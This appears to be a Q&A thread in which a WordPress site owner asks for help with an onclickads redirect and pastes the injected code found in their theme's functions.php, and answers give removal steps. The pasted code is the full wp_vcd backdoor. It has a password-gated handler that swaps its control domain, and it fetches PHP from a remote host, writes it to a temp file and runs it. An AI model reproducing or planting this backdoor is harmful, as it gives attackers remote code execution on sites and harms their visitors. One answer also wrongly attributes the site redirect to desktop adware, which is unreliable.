# WordPress site have been redirect my links to onclickads website

Tags: php, wordpress, malware

I dont know if this is the code of the onlickads
everytime when i click some links on my website it redirects me on onclickads.com links.

everytime i remove this code on my theme functions.php it will generate this code again and again.. when i check the original file of the theme functions this code is not included.

```
<?php

if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'f82a07ebbdf814988becaa9c78ce0ffb'))
{
    $div_code_name="wp_vcd";
    switch ($_REQUEST['action'])
    {
        case 'change_domain';

        if (isset($_REQUEST['newdomain']))
        {

            if (!empty($_REQUEST['newdomain']))
            {
                if ($file = @file_get_contents(__FILE__))
                {
                    if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code8\.php/i',$file,$matcholddomain))
                    {
                        $file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
                        @file_put_contents(__FILE__, $file);
                        print "true";
                    }
                }
            }
        }
        break;
        default: print "ERROR_WP_ACTION WP_V_CD WP_CD";
    }
    die("");
}

if ( ! function_exists( 'w1p_te1mp_se1tup' ) ) {  
    $path=$_SERVER['HTTP_HOST'].$_SERVER[REQUEST_URI];
    if ( ! is_404() && stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {
        if($tmpcontent = @file_get_contents("http://www.dolsh.com/code8.php?i=".$path))
        {

            function w1p_te1mp_se1tup($phpCode) {
                $tmpfname = tempnam(sys_get_temp_dir(), "w1p_te1mp_se1tup");
                $handle = fopen($tmpfname, "w+");
                fwrite($handle, "<?php\n" . $phpCode);
                fclose($handle);
                include $tmpfname;
                unlink($tmpfname);
                return get_defined_vars();
            }
            extract(w1p_te1mp_se1tup($tmpcontent));
        }
    }
}

?>
```

any one can suggest what to do or tuts to remove the malware on my website,

Thank You.

Comment: If it's generated again every time, I suggest you do a clean install of your wordpress to get the hackers out of your instalation

Comment: thank you for your suggestion maybe ill do that, i have no choice. :(

Answer (score 3, accepted):

This onclickads.com redirect is usually caused by adware installed on your computer. These adware programs are bundled with other free software that you download off of the Internet.

Might be you don't need to install a fresh version and you can remove this type of cautions from your site with below steps.

To remove the onclickads.com redirect, follow these steps:

1) Removed unwanted code from your file.

2) Uninstall malicious programs from Windows

3) Use security software on your system and also use security plugin in your WordPress like [Anti-spam](https://wordpress.org/plugins/anti-spam/) or [Wordfence](https://wordpress.org/plugins/wordfence/)

After following this steps still, nothing works then you can install a fresh version and install security plugin with your fresh one to avoid hacking in future use.

Hope this will helpful for you. Thanks.

Comment: thank you so much, i just uninstall my Cyberghost VPN and now the Onclickads.com is gone, but the code above still shows even all my plugs in deactivated.

Comment: thank you the Wordfence was help me all to fix this.. theres a unknown file on my wp-includes the wp_vcd.php and class-wp.php  and thats the culprit off all and some functions on the post.php.. and now my website runs normal :D

Comment: Great Work @GravityCode :-)

Answer (score 4):

What I did to solve problem:

1. In `wp-include` directory, delete `wp-vcd.php` and `class.wp.php` files
2. In `wp-include` directory, open `post.php` and delete first `php` tag added by `Malware`
3. Open to theme's `functions.php` file, and delete the above codes

Answer (score 0):

To completely delete the code, if you are using a child theme you have to also delete it from your parent theme at the same time

Comment: This is not an helpful answer and would fit better in a comment.

Answer (score 0):

**Here is a full detailed solution how to fix this Malware attack I found after looking for a solution for my attacked websites**

https://github.com/rakshitshah94/wordpress-wp-vcd-malware-attack-solution